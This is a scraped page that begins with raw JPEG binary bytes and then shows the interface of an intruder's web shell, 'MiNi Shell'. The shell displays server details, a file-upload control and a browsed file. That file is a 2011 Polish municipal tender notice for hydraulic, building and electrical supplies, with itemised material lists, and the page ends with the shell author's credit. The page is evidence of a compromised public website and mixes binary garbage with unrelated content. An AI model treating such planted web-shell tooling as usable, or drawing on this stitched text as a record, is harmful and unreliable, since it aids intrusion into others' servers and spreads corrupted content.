JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111227/438466-N-2011.html

<p class="kh_header"><b>Raciborowice: Sukcesywna dostawa materiałów w roku 2012</b><br>
<b>Numer ogłoszenia: 438466 - 2011; data zamieszczenia: 27.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Komunalnej w Warcie Bolesławieckiej zs. w Lubkowie , Lubków 63, 59-720 Raciborowice, woj. dolnośląskie, tel. 75 738 93 43, faks 75 731 00 50.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.gzgk-wartaboleslawiecka.samorzady.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa materiałów w roku 2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa materiałów hydraulicznych, budowlanych, elektrycznych do siedziby Zamawiającego (Zakładu Gospodarki Komunalnej w Warcie Bol. zs. w Lubkowie, Lubków 63). 
1)	Szczegółowy zakres przedmiotu zamówienia w asortymencie i w szacunkowej ilości określono w zał. nr 5, 6, 7 do specyfikacji istotnych warunków zamówienia.
2)	 Podstawą oceny materiałów objętych tym postępowaniem będą wymagania normatywne zawarte w normach przedmiotowych dla klasy danego materiału.
3)	Wykonawca zobowiązuje się na żądanie Zamawiającego do przedłożenia i przekazania atestów i aprobat technicznych, które potwierdzają jakość materiałów.
4)	Dowóz dostaw gwarantuje Wykonawca własnym transportem i na własny koszt.
5)	Wykonawca zobowiązuje się dostarczać materiały wysokiej jakości.
6)	Dostawy materiałów hydraulicznych następować będą sukcesywnie od dnia podpisania umowy do 31.12.2011 roku, od poniedziałku do piątku, w godzinach i ilościach podanych w zamówieniu pisemnym lub telefonicznym. Termin dostaw maksymalnie 4 dni od dnia złożenia zamówienia przez Zamawiającego, a w przypadku wystąpienia awarii technicznych realizacja zamówienia przez Wykonawcę nastąpi do 2 dni.
7)	Zamawiający zastrzega, że zakup mniejszej ilości materiałów hydraulicznych lub elektrycznych lub budowlanych nie może być powodem roszczeń Wykonawcy w stosunku do Zamawiającego. Zakres przedmiotowy dostaw z podziałem na części zamówienia określono w załącznikach nr 5, nr 6, nr 7. Ilości przedmiotu dostaw są ilościami szacunkowymi i jako takie nie mogą stanowić podstawy do wnoszenia przez Wykonawcę jakichkolwiek roszczeń, co do ilości faktycznie zamawianych materiałów przez zamawiającego w toku realizacji umowy w sprawie niniejszego zamówienia publicznego.
8)	Cena oferty w poszczególnych częściach jest stała przez okres obowiązywania umowy              i nie podlega waloryzacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 44.13.00.00-0, 44.13.40.00-8, 44.16.00.00-9, 44.11.10.00-1, 31.00.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści ofert, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej,                          z uwzględnieniem podawanych warunków ich wprowadzenia:
1) Zmiana terminu realizacji przedmiotu umowy:
	1. Zmiany spowodowane warunkami atmosferycznymi w szczególności:
  	a) klęski żywiołowe
	b) warunki atmosferyczne uniemożliwiające wykonanie dostaw
	2. Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego 		w szczególności wstrzymanie dostaw przez Zamawiającego
3. Inne przyczyny zewnętrzne niezależne od zamawiającego oraz Wykonawcy skutkujące niemożliwością wykonywania dostaw.
2) Pozostałe zmiany:
a) zmiana obowiązującej stawki VAT:
b) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku
wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający
zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca
poniósł w związku z wynikającymi z umowy planowanymi świadczeniami,
c) zmiany oferty z korzyścią dla Zamawiającego z zachowaniem ceny określonej w złożonej ofercie.
 Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający
może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.gzgk-wartaboleslawiecka.samorzady.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Komunalnej
w Warcie Bolesławieckiej zs. w Lubkowie
Lubków 63
59-720 Raciborowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.01.2012 godzina 09:00, miejsce: Zakład Gospodarki Komunalnej
w Warcie Bolesławieckiej zs. w Lubkowie
Lubków 63
59-720 Raciborowice
Pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sukcesywna dostawa materiałów hydraulicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	MATERIAŁY HYDRAULICZNE	Ilość
1	Hydrant n-z fi 80	7 szt.
2	Kineta fi 315-160 przelot K	2 szt.
3	Kineta fi 315-160 zbiorcza K	2 szt.
4	Kolano fi 80	1 szt.
5	Kolano PCV kanalizacyjne 160-15	2 szt.
6	Kolano PCV kanalizacyjne 160-30	4 szt.
7	Kolano PCV kanalizacyjne 160-45	6 szt.
8	Kolano PCV kanalizacyjne 160-90	4 szt.
9	Kolano fi 100	4 szt.
10	Kolano stopowe fi 80 kołnierzowe	2 szt.
11	Kołnierz płaski stal.DN 80  89 PN 16	6 szt.
12	Korek PCV fi 160 kanalizacja 	6 szt.
13	Króciec FW fi 100 	3 szt.
14	Króciec FW fi 150	1szt.
15	Łańcuch kwasoodporny fi 3	48,75 mb
16	Łańcuch kwasoodporny fi 5	50 mb
17	Łuk PCV 90-22 ciśnieniowy PN10 woda	1szt.
18	Łuk PCV 90-45  ciśnieniowy PN10 woda	1szt.
19	Łuk PCV fi 90-60	1szt.
20	Łuk PCV fi 90-90	2 szt.
21	Nakrętka M 16 ocynk	0,5kg
22	Nakrętka M 6 ocynk	1,1kg
23	Nasuwka PCV fi 110  ciśnieniowa PN10 woda	10 szt.
24	Nasuwka PCV fi 160  ciśnieniowa PN10 woda	6 szt.
25	Nasuwka PCV fi 90   ciśnieniowa PN10 woda	11 szt.
26	Obudowa do zasuwy fi 80 teleskopowa	1 szt.
27	Opaska naprawcza 80-250	1szt.
28	Opaska naprawcza 100-250 stal.	1 szt.
29	PCV-rura wew. 110-0,5m kanalizacyjna	1 szt.
30	PCV-rura wew. 110-2m kanalizacyjna	1 szt.
31	Płyta betonowa pod teleskop fi 315	5 szt.
32	Podkładka M 6 ocynk	0,5kg
33	Pokrywa betonowa 315 K	1 szt.
34	Pokrywa żelbetowa 40T L315 D 400 b-m teleskopowa	6 kpl.
35	Pokrywa żelbetowa 12,5 T. L315 B125 b-m teleskopowa	1 kpl.
36	Rura karbowana fi 315 L2000	4 szt.
37	Rura nierdzewna 88,9x2,0	18mb
38	Rura PCV kan.fi 160x4,9  6mb	40 szt.
39	Stożek betonowy fi 315 K	1 szt.
40	Środek poślizgowy 1000g Skidol	2 szt.
41	Śruba M 16x80 ocynk	2,3kg
42	Śruba M 6x 40 ocynk	1,004kg
43	Trójnik 80x80 bosy	1 szt.
44	Uszczelka ciśnieniowa fi 110	20 szt.
45	Uszczelka ciśnieniowa fi 160	12 szt.
46	Uszczelka ciśnieniowa fi 90	19 szt.
47	Uszczelka fi 315 do rury karbowanej	6 szt.
48	Uszczelka płaska fi 100	10 szt.
49	Uszczelka płaska fi 80	3 szt.
50	Zasuwa fi 80 	1 szt.
51	Zawór zwrotny kulowy fi 80	1 szt.
52	Zwężka FFR 100-50	2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.13.00.00-0, 44.13.40.00-8, 44.16.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sukcesywna dostawa materiałów budowlanych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	MATERIAŁY BUDOWLANE	Ilość
1	Blacha 16x2000x6000 S235JR+AR	3 szt.
2	Blacha czarna zwykła 3,0x1Mx2M	5 szt.
3	Blacha czarna zwykła 5.0x1mx2m ST3SX	1 szt.
4	Blacha łezkowa 4,0x1mx2m S235JRG2	2 szt.
5	Cement 25kg II-B-M 32.5 R	0,4 T
6	Drut naciągowy powlekany ocynk	7,2kg
7	Emalia kolor  0,9 l.	2 szt.
8	Emalia biała 5 l.	1 szt.
9	Emulsja biała 10 l.	1 szt.
10	Emulsja lateksowa 5l. 	2 szt.
11	Farba chlorokauczukowa kolor 1 l.	15 szt.
12	Farba emulsja 0,8 kolor	1 szt.
13	Farba emulsja kolor 2,5 l.	1 szt.
14	Farba emulsja kolor  5l.	1 szt.
15	Farba epoksydowa 5l.	12 szt.
16	Kołek K-12-60 (100szt.)	0.3 op.
17	Kołek szybkiego montażu 6x40mm	50 szt.
18	Kołek uniwersalny 8  4,5x60 (100szt.)	0.4 op.
19	Kształtownik zam. 40x40x3	6 mb
20	Listwa LM 55 podłogowa	7 szt.
21	Listwa LM 55 zakończenie	2 szt.
22	Listwa LM55 narożnik-łącznik	11 szt.
23	Nakrętka M12 kl.12	0,20 szt.
24	Nakrętka M8 ocynk	0,15 kg
25	Płaskownik 30x5	5,8 kg
26	Płaskownik 60mm 60x6	12,7 kg
27	Podkład pod tynk kwarc-grunt 4 kg	1 szt.
28	Podkładka 12 duża 	0,85 kg
29	Podkładka 16 OC	0,300kg
30	Podkładka 20 OC Sprężynowa	0,200kg
31	Preparat gruntujący 5,0 l.	1 szt.
32	Rozcieńczalnik chlorokauczukowy 0,5 l.	3 szt.
33	Rozcieńczalnik uniwersalny 0,5l.	4 szt.
34	Rozcieńczalnik uniwersalny 5l.	1 szt.
35	Siatka ogrodzeniowa ocynk powlekana 5x5	140m2
36	Silikon masa uszczelniająca 300 ml.	2 szt.
37	Śruba maszynowa M20x40	0,6 kg
38	Śruba maszynowa M20x60	1,2 kg
39	Śruba maszynowa M12x70 kl.12,9	0,20 szt.
40	Śruba maszynowa M8x90	0,65 kg
41	Śruba rzymska hak-hak 10x125	7szt
42	Śruba rzymska hak-oko 10x125 OC 	2szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.11.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sukcesywna dostawa materiałów elektrycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	MATERIAŁY ELEKTRYCZNE	Ilość
1	Czujnik poziomu cieczy CP-2Z	1 szt.
2	Dioda LED fi 5  220V czerwona 5R-230	1 szt.
3	Dioda LED fi 5  220V zielona 5G-230	1 szt.
4	Dławik DE-16 gumowy	4 szt.
5	Dławik DE-29 gumowy 	1 szt.
6	Dławik PG 11	6 szt.
7	Dławik PG 21	2 szt.
8	Falownik VLT2807  195N0025  0,75kW	1 szt.
9	Gniazdo 3-faz 32A- 5 bolcowe	1 szt.
10	Gniazdo GZT4 do R4 4P na szynę	4 szt.
11	Gniazdo przenośne 3-fazowe 16A 5ST	1 szt.
12	Kaseta St22 K-1-06-1 pokrętny z piórkiem	1 szt.
13	Końcówka kablowa (ZNY) Hi 1-10	200 szt.
14	Końcówka kablowa (ZNY) Hi 4-10	200 szt.
15	Końcówka kablowa KO 6-8	10 szt.
16	Końcówka kablowa (ZNY) HI 1,5-10	200 szt.
17	Końcówka kablowa (ZNY) HI 2,5-10	100 szt.
18	Końcówka kablowa (ZNY) HI 2x1,5-8	100 szt.
19	Końcówka kablowa (ZNY) HI 6-12	100 szt.
20	Końcówka widełkowa KW 10-10	3 szt.
21	Korytko 40x40-2m	1 szt.
22	Lampa rtęciowa 125W E27 EP	6 szt.
23	Lampa żar.-rtęć. Mix-250  250W E40 EP	1 szt.
24	Listwa 12-torowa ELZ 6 LTF 12-6.0	2 szt.
25	Listwa instalacyjna 25x25	8 m
26	Listwa instalacyjna 40x25	6 m
27	Listwa zaciskowa 10   12-torowa	1 szt.
28	Listwa zaciskowa 6    12-torowa	1 szt.
29	Łącznik ŁK25R-2.8211 w obudowie 0-1	1 szt.
30	Łącznik rozwierny GT-432x4,80	2 szt.
31	Łącznik zwierny ST22 10-10-1 na szynę	1 szt.
32	Moduł styków pom. DILM32-XHI22	3 szt.
33	Moduł styków pom.DILM150-XHI22	4 szt.
34	Moduł styków pom.DILM32-XHI11	2 szt.
35	Mufa przel. Jop-CG-3  1,5-2,5 (K, 2Z)	1 szt.
36	Mufa przel. Jpp-CG-5 6 (K, 2Z)	1 szt.
37	Napęd pokretny 3-poł.st-22-P3cz	1 szt.
38	Nasuwka konektor.-gniazdo MS 6,3-6 (100szt)	1 op
39	Opaska GT-432x4,80	300 szt.
40	Opaska CV-380x7,6 czarna	100 szt.
41	Opaska kablowa TK-40(37)-5 (kpl.=100szt)	1 kpl
42	Podkładka AL.-CU fi 8 (PMA8)	20 szt.
43	Próbnik samochodowy 6-24V z przewodem masowym	1 szt.
44	Przekaź.R4-2014-23-5024- 4P 24Vac	4 szt.
45	Przekaźnik kolejn.zaniku fazy CKF-B	1 szt.
46	Przekaźnik RM96-1011-35-1024	1 szt.
47	Przekaźnik zaniku fazy CZF-BS	1 szt.
48	Przewód samochodowy  YLY-S 6x1+1x1,5 	53 m
49	Przewód LgY 1,5	30 m
50	Przewód LgY 2,5	20 m
51	Przewód LgY 4	20 m
52	Przewód LgY 6	2 m
53	Przewód ogł. 3x2,5 do pomp	50 m
54	Przewód OWY 5x4 HO5V V-F	6 m
55	Przewód poj.linka T. LgY 0,75	15 m
56	Przewód YDY 4x2,5	30 m
57	Przewód YDY 5x4	40 m
58	Przycisk NEF-30-Ukz XY uszcz.czerw.	1 szt.
59	Przycisk NEF-30-Ukz XY uszcz.ziel.	1 szt.
60	Przycisk ST22-B-01	1 szt.
61	Przystawka PS M250 1z+1r M901-00001	3 szt.
62	Przystawka PS-350 P904-000012	4 szt.
63	Rozdzielnica Ex 171	2 szt.
64	Rozgałąźnik LZ 5x35-16 22P szyna TH	1 szt.
65	Rurka RC 4,8-2,4 term.	2 szt.
66	Rurka RC 4-1 term.	2 szt.
67	Rurka RL-18 biała	10 szt.
68	Sonda zwieszakowa SW-1-X=50m	3 szt.
69	Stycznik CL25A300T6 230 V AC	2 szt.
70	Stycznik DILM17-10  7,5kW	1 szt.
71	Stycznik DILM32-10  15 kW	4 szt.
72	Stycznik DILM40  230V  18,5kW	1 szt.
73	Stycznik DILM50 230VAC 22 kW	3 szt.
74	Styki pomocnicze BCLF-01 0z1r	4 szt.
75	Styki pomocnicze BCLF-10 1z0r	4 szt.
76	Szyna montażowa TH-35 1m	 3 szt.
77	Świetlówka LF18W G13 54-765 dzienna	15 szt.
78	Taśma AB-6905 19mmx10m samowulkan.	1 szt.
79	Taśma AB-6905 19mmx3m samowulkan.	1 szt.
80	Taśma elektroizolacyjna 20m-19mm 	10 szt.
81	Taśma izolacyjna scotch 23	2 szt.
82	Taśma izolacyjna TO 19x20	30 szt.
83	Termik ZB32-16	1 szt.
84	Termik ZB65-40 (24-40)	2 szt.
85	Transf.moduł.TM-40-T  230-24V	1 szt.
86	Transf.moduł.TM-60-T 230-24V	1 szt.
87	Trzymacz ku-1-35 żółty 	4 szt.
88	Uchwyt do rur -18 biały	50 szt.
89	Wkł.bez.mocy WT-1(WT-1C) 63A	4 szt.
90	Wkręt sam.WS-4,8x25	50 szt.
91	Wtyczka 3-faz 32A 5 bolcowa	1 szt.
92	Wyłącznik ciśnieniowy LCA-1	1 szt.
93	Wyłącznik instalacyjny M-250 1Z-1R 10A 	1 szt.
94	Wyłącznik M-250  10-16  7,5 kW	2 szt.
95	Wyłącznik M-250 6,3-10A 4,0kW	4 szt.
96	Wyłącznik nadprądowy S301 C-1 	2 szt.
97	Wyłącznik nadprądowy S303 C-16	1 szt.
98	Wyłącznik nadprądowy S303 C-20	2 szt.
99	Wyłącznik nadprądowy S303 C-32	 3 szt.
100	Wyłącznik różn.prądowy P304 40-30AC	1 szt.
101	Wyłącznik różn.prądowy P312B 10-30 AC	1 szt.
102	Wyłącznik różn.prądowy P312B 20-30 AC	1 szt.
103	Zaciskacz konektorów YYT 11 profi	1 szt.
104	Zapłonnik 4   22W S2	10 szt.
105	Zegar sterujący APC-DR1 ETI	1 szt.
106	Złączka cu Z-10	5 szt.
107	Złączka ochronna ZUO-10	1 szt.
108	Złączka ochronna ZUO-4	3 szt.
109	Złączka ZCLF-18 biała	15 szt.
110	Złączka zug-g-10 niebieska 	1 szt.
111	Złączka zug-g-10 szara	4 szt.
112	Złączka zug-g-2.5 szara	6 szt.
113	Złączka zug-g-4 szara 	10 szt.
114	Żarówka przezroczysta 75W E-27	4 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.00.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com